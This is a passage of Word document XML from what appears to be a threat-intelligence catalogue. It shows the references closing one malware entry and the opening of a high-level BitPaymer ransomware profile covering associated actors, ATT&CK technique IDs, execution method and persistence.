                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Monitor process injection activity, inspect suspicious service creation, enable EDR and behavioral analytics, restrict administrative privileges, monitor outbound network traffic, apply application whitelisting, and use file integrity monitoring.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC4402" w:rsidRPr="003168F2" w14:paraId="4F115740" w14:textId="77777777" w:rsidTr="009B4494">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6B43A899" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>References &amp; Sources</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1DA7F291" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve">1. </w:t>
            </w:r>
            <w:hyperlink r:id="rId53" w:history="1">
              <w:r w:rsidRPr="003168F2">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                  <w:sz w:val="18"/>
                  <w:szCs w:val="14"/>
                </w:rPr>
                <w:t>MITRE ATT&amp;CK Explosive S0569</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve"> 2. </w:t>
            </w:r>
            <w:hyperlink r:id="rId54" w:history="1">
              <w:r w:rsidRPr="003168F2">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                  <w:sz w:val="18"/>
                  <w:szCs w:val="14"/>
                </w:rPr>
                <w:t>MITRE ATT&amp;CK Software Catalog</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve"> 3. </w:t>
            </w:r>
            <w:hyperlink r:id="rId55" w:history="1">
              <w:r w:rsidRPr="003168F2">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                  <w:sz w:val="18"/>
                  <w:szCs w:val="14"/>
                </w:rPr>
                <w:t xml:space="preserve">Kaspersky </w:t>
              </w:r>
              <w:proofErr w:type="spellStart"/>
              <w:r w:rsidRPr="003168F2">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                  <w:sz w:val="18"/>
                  <w:szCs w:val="14"/>
                </w:rPr>
                <w:t>Winnti</w:t>
              </w:r>
              <w:proofErr w:type="spellEnd"/>
              <w:r w:rsidRPr="003168F2">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                  <w:sz w:val="18"/>
                  <w:szCs w:val="14"/>
                </w:rPr>
                <w:t xml:space="preserve"> Research</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve"> 4. </w:t>
            </w:r>
            <w:hyperlink r:id="rId56" w:history="1">
              <w:r w:rsidRPr="003168F2">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                  <w:sz w:val="18"/>
                  <w:szCs w:val="14"/>
                </w:rPr>
                <w:t>Trend Micro APT41 Research</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve"> 5. </w:t>
            </w:r>
            <w:hyperlink r:id="rId57" w:history="1">
              <w:r w:rsidRPr="003168F2">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                  <w:sz w:val="18"/>
                  <w:szCs w:val="14"/>
                </w:rPr>
                <w:t>Mandiant Threat Intelligence</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2740B782" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DED44ED" w14:textId="63491420" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Bitpaymer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidR="009B4494" w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> S0570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3"/>
        <w:gridCol w:w="8985"/>
      </w:tblGrid>
      <w:tr w:rsidR="009B4494" w:rsidRPr="003168F2" w14:paraId="491508D2" w14:textId="77777777" w:rsidTr="009B4494">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="587BDA96" w14:textId="77777777" w:rsidR="009B4494" w:rsidRPr="003168F2" w:rsidRDefault="009B4494" w:rsidP="009B4494">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="227DA44E" w14:textId="77777777" w:rsidR="009B4494" w:rsidRPr="003168F2" w:rsidRDefault="009B4494" w:rsidP="009B4494">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Details</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B4494" w:rsidRPr="003168F2" w14:paraId="124BB0B2" w14:textId="77777777" w:rsidTr="009B4494">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="47003AE1" w14:textId="77777777" w:rsidR="009B4494" w:rsidRPr="003168F2" w:rsidRDefault="009B4494" w:rsidP="009B4494">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Name &amp; Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6EDF945D" w14:textId="77777777" w:rsidR="009B4494" w:rsidRPr="003168F2" w:rsidRDefault="009B4494" w:rsidP="009B4494">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>BitPaymer (S0570)</w:t>
            </w:r>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve"> – Malware / Ransomware</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B4494" w:rsidRPr="003168F2" w14:paraId="68F508A8" w14:textId="77777777" w:rsidTr="009B4494">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7CC64858" w14:textId="77777777" w:rsidR="009B4494" w:rsidRPr="003168F2" w:rsidRDefault="009B4494" w:rsidP="009B4494">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5DD25433" w14:textId="77777777" w:rsidR="009B4494" w:rsidRPr="003168F2" w:rsidRDefault="009B4494" w:rsidP="009B4494">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>BitPaymer is a ransomware family used in targeted attacks against enterprise environments. It encrypts files on compromised systems and demands ransom payments in cryptocurrency. The malware has been associated with financially motivated cybercriminal groups and has targeted healthcare, government, education, and critical infrastructure organizations.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B4494" w:rsidRPr="003168F2" w14:paraId="3D540878" w14:textId="77777777" w:rsidTr="009B4494">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1B5A16F6" w14:textId="77777777" w:rsidR="009B4494" w:rsidRPr="003168F2" w:rsidRDefault="009B4494" w:rsidP="009B4494">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Threat Actor Association</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6A2F8D7E" w14:textId="77777777" w:rsidR="009B4494" w:rsidRPr="003168F2" w:rsidRDefault="009B4494" w:rsidP="009B4494">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>INDRIK SPIDER, Wizard Spider, TA505 (reported overlaps in operations/tooling)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B4494" w:rsidRPr="003168F2" w14:paraId="0351B067" w14:textId="77777777" w:rsidTr="009B4494">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5BD5BA6F" w14:textId="77777777" w:rsidR="009B4494" w:rsidRPr="003168F2" w:rsidRDefault="009B4494" w:rsidP="009B4494">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Supported Platforms</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="315E222C" w14:textId="77777777" w:rsidR="009B4494" w:rsidRPr="003168F2" w:rsidRDefault="009B4494" w:rsidP="009B4494">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B4494" w:rsidRPr="003168F2" w14:paraId="79D17B82" w14:textId="77777777" w:rsidTr="009B4494">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6FE91EA8" w14:textId="77777777" w:rsidR="009B4494" w:rsidRPr="003168F2" w:rsidRDefault="009B4494" w:rsidP="009B4494">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>ATT&amp;CK Techniques Used</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5D49F88F" w14:textId="77777777" w:rsidR="009B4494" w:rsidRPr="003168F2" w:rsidRDefault="009B4494" w:rsidP="009B4494">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>T1486</w:t>
            </w:r>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve"> – Data Encrypted for Impact </w:t>
            </w:r>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>T1059</w:t>
            </w:r>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve"> – Command and Scripting Interpreter </w:t>
            </w:r>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>T1027</w:t>
            </w:r>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve"> – Obfuscated Files or Information </w:t>
            </w:r>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>T1489</w:t>
            </w:r>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve"> – Service Stop </w:t>
            </w:r>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>T1562</w:t>
            </w:r>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve"> – Impair Defenses </w:t>
            </w:r>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>T1490</w:t>
            </w:r>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve"> – Inhibit System Recovery </w:t>
            </w:r>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>T1083</w:t>
            </w:r>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve"> – File and Directory Discovery </w:t>
            </w:r>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>T1082</w:t>
            </w:r>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve"> – System Information Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B4494" w:rsidRPr="003168F2" w14:paraId="79E3D5A4" w14:textId="77777777" w:rsidTr="009B4494">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="747C2A34" w14:textId="77777777" w:rsidR="009B4494" w:rsidRPr="003168F2" w:rsidRDefault="009B4494" w:rsidP="009B4494">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Execution Method</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5A6BF005" w14:textId="77777777" w:rsidR="009B4494" w:rsidRPr="003168F2" w:rsidRDefault="009B4494" w:rsidP="009B4494">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Typically deployed manually after attackers gain access through phishing, RDP compromise, or lateral movement. Once executed, BitPaymer encrypts local and network-accessible files and drops ransom notes on infected systems.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B4494" w:rsidRPr="003168F2" w14:paraId="525B4C11" w14:textId="77777777" w:rsidTr="009B4494">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3487EF03" w14:textId="77777777" w:rsidR="009B4494" w:rsidRPr="003168F2" w:rsidRDefault="009B4494" w:rsidP="009B4494">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Persistence Techniques</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5DE9186F" w14:textId="77777777" w:rsidR="009B4494" w:rsidRPr="003168F2" w:rsidRDefault="009B4494" w:rsidP="009B4494">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Persistence is not a primary focus because ransomware operations are generally intended for immediate impact; however, attackers may establish persistence earlier in the intrusion using scheduled tasks, services, or remote access tools.</w:t>
            </w:r>
